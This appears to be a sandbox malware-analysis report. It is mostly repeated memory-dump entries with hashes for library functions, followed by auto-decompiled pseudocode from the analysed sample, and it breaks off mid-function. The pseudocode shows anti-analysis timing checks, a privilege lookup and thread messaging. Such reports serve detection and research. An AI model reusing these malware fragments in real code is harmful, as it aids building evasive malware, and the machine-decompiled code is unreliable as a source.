                                          Function 00750048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                          • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                          • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007500C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409AB0, Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00409AB0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE10( &_v284, 0x104);
						E0041C480( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                          0x00409abb
                                          0x00409ac3
                                          0x00409ac5
                                          0x00409aca
                                          0x00409acf
                                          0x00409ae2
                                          0x00409ae7
                                          0x00409af0
                                          0x00409afc
                                          0x00409b0f
                                          0x00409b14
                                          0x00409b17
                                          0x00409b20
                                          0x00409b32
                                          0x00409b37
                                          0x00409b3c
                                          0x00000000
                                          0x00000000
                                          0x00409b3e
                                          0x00409b42
                                          0x00000000
                                          0x00000000
                                          0x00409b44
                                          0x00000000
                                          0x00409b42
                                          0x00409b46
                                          0x00409b49
                                          0x00409b4f
                                          0x00409b51
                                          0x00409b5c
                                          0x00409b61
                                          0x00409b64
                                          0x00409b71
                                          0x00409b7c
                                          0x00409b7e
                                          0x00409b84
                                          0x00409b88
                                          0x00409b8b
                                          0x00409b8b
                                          0x00409b92
                                          0x00409b95
                                          0x00409b9a
                                          0x00409ba7
                                          0x00409ad6
                                          0x00409ad6
                                          0x00409ad6

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                          • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                          • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                          • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A7C2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID: .AP
                                          • API String ID: 3899507212-3996626295
                                          • Opcode ID: eb4639adcfe72850460e52e010fafad2700d855224a7a1726b57435985c72a8e
                                          • Instruction ID: c009012f4d06892a8badbdf1a61c079b067406075ed75cb7a71715715e278ce3
                                          • Opcode Fuzzy Hash: eb4639adcfe72850460e52e010fafad2700d855224a7a1726b57435985c72a8e
                                          • Instruction Fuzzy Hash: 231191B5200248ABCB14DF69DC80DEB77A9EF88318F14854AF94D97202C634E8218BB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                          0x0041a647
                                          0x0041a652
                                          0x0041a65d
                                          0x0041a661

                                          APIs
                                          • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: 6EA
                                          • API String ID: 1279760036-1400015478
                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408308, Relevance: 1.6, APIs: 1, Instructions: 59threadwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 30%
                                          			E00408308(intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				long _t20;
				void* _t24;
				int _t25;
				void* _t28;
				void* _t30;

				asm("popad");
				asm("in al, 0xe8");
				asm("out 0xb6, eax");
				asm("adc [ecx], ebx");
				asm("arpl [ebp-0x75], dx");
				_t28 = _t30;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_push( &_v68);
				_t24 = _a4 + 0x1c;
				_push(_t24); // executed
				_t12 = E0040ACF0(); // executed
				_t13 = E00414E50(_t24, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t20 = _a8;
					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
					_t37 = _t13;
					if(_t13 == 0) {
